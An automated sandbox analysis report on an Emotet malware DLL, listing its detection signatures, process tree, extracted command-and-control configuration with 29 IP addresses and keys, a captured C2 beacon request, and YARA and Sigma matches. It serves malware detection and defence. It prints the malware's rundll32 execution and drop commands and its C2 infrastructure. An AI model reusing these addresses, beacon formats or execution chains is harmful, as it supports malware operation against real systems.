Loading ...

Play interactive tourEdit tour

Windows Analysis Report 2gyA5uNl6VPQUA.dll

Overview

General Information

Sample Name:2gyA5uNl6VPQUA.dll
Analysis ID:532048
MD5:5e20cb3466b66a9cdeac1ac74d9862e4
SHA1:28ef4facb366de1fc7da62b975c8967997527c36
SHA256:208939e34f46846c7c95383c6fea7813038b4dea87ea3819c157ccfbbf8aa09a
Tags:dll
Infos:

Most interesting Screenshot:

Detection

Emotet
Score:88
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Yara detected Emotet
System process connects to network (likely due to code injection or exploit)
Sigma detected: Emotet RunDLL32 Process Creation
C2 URLs / IPs found in malware configuration
Hides that the sample has been downloaded from the Internet (zone.identifier)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
One or more processes crash
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Deletes files inside the Windows folder
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Creates files inside the system directory
Internet Provider seen in connection with other malware
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to dynamically determine API calls
HTTP GET or POST without a user agent
Contains functionality which may be used to detect a debugger (GetProcessHeap)
IP address seen in connection with other malware
Abnormal high CPU Usage
AV process strings found (often used to terminate AV products)
Contains functionality to read the PEB
Drops PE files to the windows directory (C:\Windows)
Checks if the current process is being debugged
Connects to several IPs in different countries
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

  • System is w10x64
  • svchost.exe (PID: 6108 cmdline: c:\windows\system32\svchost.exe -k unistacksvcgroup MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • loaddll32.exe (PID: 6376 cmdline: loaddll32.exe "C:\Users\user\Desktop\2gyA5uNl6VPQUA.dll" MD5: 72FCD8FB0ADC38ED9050569AD673650E)
    • cmd.exe (PID: 6628 cmdline: cmd.exe /C rundll32.exe "C:\Users\user\Desktop\2gyA5uNl6VPQUA.dll",#1 MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • rundll32.exe (PID: 6704 cmdline: rundll32.exe "C:\Users\user\Desktop\2gyA5uNl6VPQUA.dll",#1 MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
        • rundll32.exe (PID: 6484 cmdline: C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\Desktop\2gyA5uNl6VPQUA.dll",Control_RunDLL MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • rundll32.exe (PID: 6608 cmdline: rundll32.exe C:\Users\user\Desktop\2gyA5uNl6VPQUA.dll,Control_RunDLL MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
      • rundll32.exe (PID: 7024 cmdline: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Qrcyfrqyrevqn\zfjlg.mpd",GeWefLGOgdb MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
        • rundll32.exe (PID: 4068 cmdline: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\Qrcyfrqyrevqn\zfjlg.mpd",Control_RunDLL MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • rundll32.exe (PID: 6892 cmdline: rundll32.exe C:\Users\user\Desktop\2gyA5uNl6VPQUA.dll,axamexdrqyrgb MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
      • rundll32.exe (PID: 1740 cmdline: C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\Desktop\2gyA5uNl6VPQUA.dll",Control_RunDLL MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • rundll32.exe (PID: 6856 cmdline: rundll32.exe C:\Users\user\Desktop\2gyA5uNl6VPQUA.dll,bhramccfbdd MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
      • rundll32.exe (PID: 7052 cmdline: C:\Windows\SysWOW64\rundll32.exe "C:\Users\user\Desktop\2gyA5uNl6VPQUA.dll",Control_RunDLL MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
    • WerFault.exe (PID: 4200 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6376 -s 304 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
    • WerFault.exe (PID: 5076 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6376 -s 308 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
  • svchost.exe (PID: 2296 cmdline: C:\Windows\System32\svchost.exe -k WerSvcGroup MD5: 32569E403279B3FD2EDB7EBD036273FA)
    • WerFault.exe (PID: 7092 cmdline: C:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 6376 -ip 6376 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
    • WerFault.exe (PID: 6284 cmdline: C:\Windows\SysWOW64\WerFault.exe -pss -s 164 -p 6376 -ip 6376 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
  • svchost.exe (PID: 4504 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 5552 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 1980 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 6304 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • cleanup

Malware Configuration

Threatname: Emotet

{"C2 list": ["46.55.222.11:443", "104.245.52.73:8080", "41.76.108.46:8080", "103.8.26.103:8080", "185.184.25.237:8080", "103.8.26.102:8080", "203.114.109.124:443", "45.118.115.99:8080", "178.79.147.66:8080", "58.227.42.236:80", "45.118.135.203:7080", "103.75.201.2:443", "195.154.133.20:443", "45.142.114.231:8080", "212.237.5.209:443", "207.38.84.195:8080", "104.251.214.46:8080", "212.237.17.99:8080", "212.237.56.116:7080", "216.158.226.206:443", "110.232.117.186:8080", "158.69.222.101:443", "107.182.225.142:8080", "176.104.106.96:8080", "81.0.236.90:443", "50.116.54.215:443", "138.185.72.26:8080", "51.68.175.8:8080", "210.57.217.132:8080"], "Public Key": ["RUNTMSAAAABAX3S2xNjcDD0fBno33Ln5t71eii+mofIPoXkNFOX1MeiwCh48iz97kB0mJjGGZXwardnDXKxI8GCHGNl0PFj5", "RUNLMSAAAADzozW1Di4r9DVWzQpMKT588RDdy7BPILP6AiDOTLYMHkSWvrQO5slbmr1OvZ2Pz+AQWzRMggQmAtO6rPH7nyx2"]}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000019.00000003.778115242.000000000112B000.00000004.00000001.sdmpJoeSecurity_Emotet_1Yara detected EmotetJoe Security
    00000001.00000000.578776757.0000000000A5D000.00000004.00000020.sdmpJoeSecurity_Emotet_1Yara detected EmotetJoe Security
      00000006.00000002.578455384.00000000007FA000.00000004.00000020.sdmpJoeSecurity_Emotet_1Yara detected EmotetJoe Security
        00000001.00000002.596108665.0000000000A5D000.00000004.00000020.sdmpJoeSecurity_Emotet_1Yara detected EmotetJoe Security
          00000001.00000002.595999827.0000000000930000.00000040.00000010.sdmpJoeSecurity_Emotet_1Yara detected EmotetJoe Security
            Click to see the 17 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            1.0.loaddll32.exe.930000.0.raw.unpackJoeSecurity_Emotet_1Yara detected EmotetJoe Security
              6.2.rundll32.exe.812098.1.unpackJoeSecurity_Emotet_1Yara detected EmotetJoe Security
                4.2.rundll32.exe.f90000.1.unpackJoeSecurity_Emotet_1Yara detected EmotetJoe Security
                  1.0.loaddll32.exe.930000.0.unpackJoeSecurity_Emotet_1Yara detected EmotetJoe Security
                    1.0.loaddll32.exe.a63b70.1.unpackJoeSecurity_Emotet_1Yara detected EmotetJoe Security
                      Click to see the 35 entries

                      Sigma Overview

                      System Summary:

                      barindex
                      Sigma detected: Emotet RunDLL32 Process CreationShow sources
                      Source: Process startedAuthor: FPT.EagleEye: Data: Command: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\Qrcyfrqyrevqn\zfjlg.mpd",Control_RunDLL, CommandLine: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\Qrcyfrqyrevqn\zfjlg.mpd",Control_RunDLL, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\rundll32.exe, NewProcessName: C:\Windows\SysWOW64\rundll32.exe, OriginalFileName: C:\Windows\SysWOW64\rundll32.exe, ParentCommandLine: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Qrcyfrqyrevqn\zfjlg.mpd",GeWefLGOgdb, ParentImage: C:\Windows\SysWOW64\rundll32.exe, ParentProcessId: 7024, ProcessCommandLine: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\Qrcyfrqyrevqn\zfjlg.mpd",Control_RunDLL, ProcessId: 4068

                      Jbx Signature Overview

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection:

                      barindex
                      Found malware configurationShow sources
                      Source: 5.2.rundll32.exe.7e0000.0.unpackMalware Configuration Extractor: Emotet {"C2 list": ["46.55.222.11:443", "104.245.52.73:8080", "41.76.108.46:8080", "103.8.26.103:8080", "185.184.25.237:8080", "103.8.26.102:8080", "203.114.109.124:443", "45.118.115.99:8080", "178.79.147.66:8080", "58.227.42.236:80", "45.118.135.203:7080", "103.75.201.2:443", "195.154.133.20:443", "45.142.114.231:8080", "212.237.5.209:443", "207.38.84.195:8080", "104.251.214.46:8080", "212.237.17.99:8080", "212.237.56.116:7080", "216.158.226.206:443", "110.232.117.186:8080", "158.69.222.101:443", "107.182.225.142:8080", "176.104.106.96:8080", "81.0.236.90:443", "50.116.54.215:443", "138.185.72.26:8080", "51.68.175.8:8080", "210.57.217.132:8080"], "Public Key": ["RUNTMSAAAABAX3S2xNjcDD0fBno33Ln5t71eii+mofIPoXkNFOX1MeiwCh48iz97kB0mJjGGZXwardnDXKxI8GCHGNl0PFj5", "RUNLMSAAAADzozW1Di4r9DVWzQpMKT588RDdy7BPILP6AiDOTLYMHkSWvrQO5slbmr1OvZ2Pz+AQWzRMggQmAtO6rPH7nyx2"]}
                      Multi AV Scanner detection for submitted fileShow sources
                      Source: 2gyA5uNl6VPQUA.dllVirustotal: Detection: 17%Perma Link
                      Source: 2gyA5uNl6VPQUA.dllStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL, LARGE_ADDRESS_AWARE
                      Source: unknownHTTPS traffic detected: 46.55.222.11:443 -> 192.168.2.3:49806 version: TLS 1.2
                      Source: 2gyA5uNl6VPQUA.dllStatic PE information: DYNAMIC_BASE, NX_COMPAT
                      Source: Binary string: wgdi32full.pdb source: WerFault.exe, 00000013.00000003.590625804.0000000005281000.00000004.00000001.sdmp
                      Source: Binary string: msvcp_win.pdb source: WerFault.exe, 00000013.00000003.590625804.0000000005281000.00000004.00000001.sdmp
                      Source: Binary string: wkernel32.pdb source: WerFault.exe, 00000013.00000003.590625804.0000000005281000.00000004.00000001.sdmp
                      Source: Binary string: ucrtbase.pdb source: WerFault.exe, 00000013.00000003.590625804.0000000005281000.00000004.00000001.sdmp
                      Source: Binary string: wkernelbase.pdb source: WerFault.exe, 00000013.00000003.590625804.0000000005281000.00000004.00000001.sdmp
                      Source: Binary string: wimm32.pdb source: WerFault.exe, 00000013.00000003.590625804.0000000005281000.00000004.00000001.sdmp
                      Source: Binary string: wwin32u.pdb source: WerFault.exe, 00000013.00000003.590625804.0000000005281000.00000004.00000001.sdmp
                      Source: Binary string: wntdll.pdb source: WerFault.exe, 00000013.00000003.590625804.0000000005281000.00000004.00000001.sdmp
                      Source: Binary string: apphelp.pdb source: WerFault.exe, 00000013.00000003.590625804.0000000005281000.00000004.00000001.sdmp
                      Source: Binary string: wuser32.pdb source: WerFault.exe, 00000013.00000003.590625804.0000000005281000.00000004.00000001.sdmp
                      Source: Binary string: wntdll.pdbk source: WerFault.exe, 00000013.00000003.590625804.0000000005281000.00000004.00000001.sdmp
                      Source: Binary string: wgdi32.pdb source: WerFault.exe, 00000013.00000003.590625804.0000000005281000.00000004.00000001.sdmp
                      Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_6E9E2FE7 FindFirstFileExW,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 3_2_6E9E2FE7 FindFirstFileExW,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 25_2_012018AC FindFirstFileW,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 25_2_01201750 FindFirstFileW,
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 25_2_0120183F FindFirstFileW,

                      Networking:

                      barindex
                      System process connects to network (likely due to code injection or exploit)Show sources
                      Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 46.55.222.11 187
                      C2 URLs / IPs found in malware configurationShow sources
                      Source: Malware configuration extractorIPs: 46.55.222.11:443
                      Source: Malware configuration extractorIPs: 104.245.52.73:8080
                      Source: Malware configuration extractorIPs: 41.76.108.46:8080
                      Source: Malware configuration extractorIPs: 103.8.26.103:8080
                      Source: Malware configuration extractorIPs: 185.184.25.237:8080
                      Source: Malware configuration extractorIPs: 103.8.26.102:8080
                      Source: Malware configuration extractorIPs: 203.114.109.124:443
                      Source: Malware configuration extractorIPs: 45.118.115.99:8080
                      Source: Malware configuration extractorIPs: 178.79.147.66:8080
                      Source: Malware configuration extractorIPs: 58.227.42.236:80
                      Source: Malware configuration extractorIPs: 45.118.135.203:7080
                      Source: Malware configuration extractorIPs: 103.75.201.2:443
                      Source: Malware configuration extractorIPs: 195.154.133.20:443
                      Source: Malware configuration extractorIPs: 45.142.114.231:8080
                      Source: Malware configuration extractorIPs: 212.237.5.209:443
                      Source: Malware configuration extractorIPs: 207.38.84.195:8080
                      Source: Malware configuration extractorIPs: 104.251.214.46:8080
                      Source: Malware configuration extractorIPs: 212.237.17.99:8080
                      Source: Malware configuration extractorIPs: 212.237.56.116:7080
                      Source: Malware configuration extractorIPs: 216.158.226.206:443
                      Source: Malware configuration extractorIPs: 110.232.117.186:8080
                      Source: Malware configuration extractorIPs: 158.69.222.101:443
                      Source: Malware configuration extractorIPs: 107.182.225.142:8080
                      Source: Malware configuration extractorIPs: 176.104.106.96:8080
                      Source: Malware configuration extractorIPs: 81.0.236.90:443
                      Source: Malware configuration extractorIPs: 50.116.54.215:443
                      Source: Malware configuration extractorIPs: 138.185.72.26:8080
                      Source: Malware configuration extractorIPs: 51.68.175.8:8080
                      Source: Malware configuration extractorIPs: 210.57.217.132:8080
                      Source: Joe Sandbox ViewASN Name: OnlineSASFR OnlineSASFR
                      Source: Joe Sandbox ViewASN Name: ARUBA-ASNIT ARUBA-ASNIT
                      Source: Joe Sandbox ViewJA3 fingerprint: 51c64c77e60f3980eea90869b68c58a8
                      Source: global trafficHTTP traffic detected: GET /UKKmNexCiEZNdWysJnUxJeBGVUutat HTTP/1.1Cookie: ryViNxlKLE=9E+7EQIWXaUCIB8lnocBFFwUUiBI8SGBfem5avtBjtVXnImPnR3whzMx0REyqL1Uc4BT3kSyDvkg+xE+CEuKtlih6TF+LkZeje1NbjVTi54TDmgo60tk/Kg/NR9aYRHyTOl+2ET6B9p/LkYlQ5eWXFQF+pel2YIcjQhyqb10bAUn21aDx78snz7WrQWN4T5bpw+7YlmPsZM9sv8/HvOYXAWEyssXnp5p0QBoT6AdMnxwJrqCeVO7AnBv3qafuoZpQrj4x4SA+CHiBieL+jDSad8SNnwqvg==Host: 46.55.222.11Connection: Keep-AliveCache-Control: no-cache
                      Source: Joe Sandbox ViewIP Address: 195.154.133.20 195.154.133.20
                      Source: Joe Sandbox ViewIP Address: 212.237.17.99 212.237.17.99
                      Source: unknownNetwork traffic detected: IP country count 18
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49806 -> 443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49806
                      Source: unknownTCP traffic detected without corresponding DNS query: 46.55.222.11
                      Source: unknownTCP traffic detected without corresponding DNS query: 46.55.222.11
                      Source: unknownTCP traffic detected without corresponding DNS query: 46.55.222.11
                      Source: unknownTCP traffic detected without corresponding DNS query: 46.55.222.11
                      Source: unknownTCP traffic detected without corresponding DNS query: 46.55.222.11
                      Source: unknownTCP traffic detected without corresponding DNS query: 46.55.222.11
                      Source: unknownTCP traffic detected without corresponding DNS query: 46.55.222.11
                      Source: unknownTCP traffic detected without corresponding DNS query: 46.55.222.11
                      Source: unknownTCP traffic detected without corresponding DNS query: 46.55.222.11
                      Source: unknownTCP traffic detected without corresponding DNS query: 46.55.222.11
                      Source: rundll32.exe, 00000019.00000002.816080192.000000000117E000.00000004.00000001.sdmp, rundll32.exe, 00000019.00000003.794999609.000000000117E000.00000004.00000001.sdmp, svchost.exe, 0000001B.00000002.714011218.0000023EE6500000.00000004.00000001.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
                      Source: svchost.exe, 0000001B.00000002.713879734.0000023EE5CEF000.00000004.00000001.sdmpString found in binary or memory: http://crl.ver)
                      Source: svchost.exe, 0000001B.00000003.688588185.0000023EE657F000.00000004.00000001.sdmp, svchost.exe, 0000001B.00000003.688701923.0000023EE65D0000.00000004.00000001.sdmpString found in binary or memory: http://help.disneyplus.com.
                      Source: Amcache.hve.19.drString found in binary or memory: http://upx.sf.net
                      Source: rundll32.exe, 00000019.00000002.816002840.000000000115E000.00000004.00000001.sdmpString found in binary or memory: https://46.55.222.11/
                      Source: rundll32.exe, 00000019.00000002.815929088.0000000001137000.00000004.00000020.sdmpString found in binary or memory: https://46.55.222.11/UKKmNexCiEZNdWysJnUxJeBGVUutat
                      Source: rundll32.exe, 00000019.00000002.815886128.000000000110A000.00000004.00000020.sdmpString found in binary or memory: https://46.55.222.11/UKKmNexCiEZNdWysJnUxJeBGVUutatZ
                      Source: svchost.exe, 0000001B.00000003.688588185.0000023EE657F000.00000004.00000001.sdmp, svchost.exe, 0000001B.00000003.688701923.0000023EE65D0000.00000004.00000001.sdmpString found in binary or memory: https://disneyplus.com/legal.
                      Source: svchost.exe, 0000001B.00000003.688588185.0000023EE657F000.00000004.00000001.sdmp, svchost.exe, 0000001B.00000003.688701923.0000023EE65D0000.00000004.00000001.sdmpString found in binary or memory: https://www.disneyplus.com/legal/privacy-policy
                      Source: svchost.exe, 0000001B.00000003.688588185.0000023EE657F000.00000004.00000001.sdmp, svchost.exe, 0000001B.00000003.688701923.0000023EE65D0000.00000004.00000001.sdmpString found in binary or memory: https://www.disneyplus.com/legal/your-california-privacy-rights
                      Source: svchost.exe, 0000001B.00000003.694452575.0000023EE658F000.00000004.00000001.sdmp, svchost.exe, 0000001B.00000003.694431854.0000023EE65A6000.00000004.00000001.sdmp, svchost.exe, 0000001B.00000003.694469243.0000023EE6A02000.00000004.00000001.sdmp, svchost.exe, 0000001B.00000003.694398444.0000023EE65A6000.00000004.00000001.sdmpString found in binary or memory: https://www.tiktok.com/legal/report/feedback
                      Source: C:\Windows\SysWOW64\rundll32.exeCode function: 25_2_01216E69 InternetReadFile,
                      Source: global trafficHTTP traffic detected: GET /UKKmNexCiEZNdWysJnUxJeBGVUutat HTTP/1.1Cookie: ryViNxlKLE=9E+7EQIWXaUCIB8lnocBFFwUUiBI8SGBfem5avtBjtVXnImPnR3whzMx0REyqL1Uc4BT3kSyDvkg+xE+CEuKtlih6TF+LkZeje1NbjVTi54TDmgo60tk/Kg/NR9aYRHyTOl+2ET6B9p/LkYlQ5eWXFQF+pel2YIcjQhyqb10bAUn21aDx78snz7WrQWN4T5bpw+7YlmPsZM9sv8/HvOYXAWEyssXnp5p0QBoT6AdMnxwJrqCeVO7AnBv3qafuoZpQrj4x4SA+CHiBieL+jDSad8SNnwqvg==Host: 46.55.222.11Connection: Keep-AliveCache-Control: no-cache
                      Source: unknownHTTPS traffic detected: 46.55.222.11:443 -> 192.168.2.3:49806 version: TLS 1.2

                      E-Banking Fraud:

                      barindex
                      Yara detected EmotetShow sources
                      Source: Yara matchFile source: 1.0.loaddll32.exe.930000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.2.rundll32.exe.812098.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.rundll32.exe.f90000.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.0.loaddll32.exe.930000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.0.loaddll32.exe.a63b70.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.0.loaddll32.exe.a63b70.7.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.0.loaddll32.exe.a63b70.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.0.loaddll32.exe.930000.6.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.0.loaddll32.exe.a63b70.4.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.0.loaddll32.exe.930000.9.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.0.loaddll32.exe.930000.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.2.loaddll32.exe.930000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.0.loaddll32.exe.930000.9.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 11.2.rundll32.exe.ec0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.rundll32.exe.7e0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.rundll32.exe.eb2170.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.rundll32.exe.f90000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.rundll32.exe.eb2170.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.rundll32.exe.852098.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.0.loaddll32.exe.a63b70.10.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.0.loaddll32.exe.a63b70.10.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.0.loaddll32.exe.a63b70.7.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 25.2.rundll32.exe.1200000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 25.2.rundll32.exe.1200000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.0.loaddll32.exe.930000.6.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 11.2.rundll32.exe.ec0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.0.loaddll32.exe.930000.3.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.rundll32.exe.852098.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.2.rundll32.exe.570000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.2.loaddll32.exe.930000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.rundll32.exe.7e0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.2.rundll32.exe.570000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 11.2.rundll32.exe.f42468.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.2.loaddll32.exe.a63b70.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.0.loaddll32.exe.a63b70.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 11.2.rundll32.exe.f42468.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.rundll32.exe.12d0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.2.loaddll32.exe.a63b70.1.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.rundll32.exe.12d0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 6.2.rundll32.exe.812098.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000019.00000003.778115242.000000000112B000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000000.578776757.0000000000A5D000.00000004.00000020.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000002.578455384.00000000007FA000.00000004.00000020.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000002.596108665.0000000000A5D000.00000004.00000020.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000002.595999827.0000000000930000.00000040.00000010.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.549793958.0000000000F90000.00000040.00000010.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000B.00000002.663770243.0000000000EC0000.00000040.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000000.578639964.0000000000930000.00000040.00000010.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000000.586858412.0000000000A5D000.00000004.00000020.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000006.00000002.578325190.0000000000570000.00000040.00000010.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000019.00000002.816294229.0000000001200000.00000040.00000010.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000003.513859712.0000000003649000.00000004.00000001.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000000.586723752.0000000000930000.00000040.00000010.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000000.584768753.0000000000930000.00000040.00000010.sdmp, type: MEMORY
                      Source: Yara matchFile source: 0000000B.00000002.663823655.0000000000F2A000.00000004.00000020.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000000.585019489.0000000000A5D000.00000004.00000020.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000000.567434432.0000000000A5D000.00000004.00000020.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000000.564974375.0000000000930000.00000040.00000010.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.538768779.0000000000E9A000.00000004.00000020.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.550893742.00000000012D0000.00000040.00000010.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.557633995.00000000007E0000.00000040.00000010.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.557657494.000000000083A000.00000004.00000020.sdmp, type: MEMORY

                      System Summary:

                      barindex
                      Source: 2gyA5uNl6VPQUA.dllStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL, LARGE_ADDRESS_AWARE
                      Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 6376 -ip 6376
                      Source: C:\Windows\SysWOW64\rundll32.exeFile deleted: C:\Windows\SysWOW64\Qrcyfrqyrevqn\zfjlg.mpd:Zone.IdentifierJump to behavior
                      Source: C:\Windows\SysWOW64\rundll32.exeFile created: C:\Windows\SysWOW64\Qrcyfrqyrevqn\Jump to behavior
                      Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_0094ED95
                      Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_0093C69B
                      Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_0093F699
                      Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_0093D899
                      Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_00933085
                      Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_00943ABE
                      Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_0093AEB9
                      Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_0094B0BA
                      Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_009404A4
                      Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_0093F4A5
                      Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_009456A9
                      Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_009368AD
                      Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_00950AD3
                      Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_00947EDD
                      Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_009354C0
                      Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_0093BEF5
                      Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_009520F8
                      Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_0093E6FD
                      Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_009506EF
                      Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_0093A8E8
                      Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_00952C16
                      Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_00941C12
                      Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_0094BA18
                      Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_0093F20D
                      Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_00940A37
                      Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_00933E3B
                      Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_0094CC3F
                      Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_00940824
                      Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_0094645F
                      Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_0094604E
                      Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_00951C71
                      Source: C:\Windows\System32\loaddll32.exeCode function: 1_2_0094E478
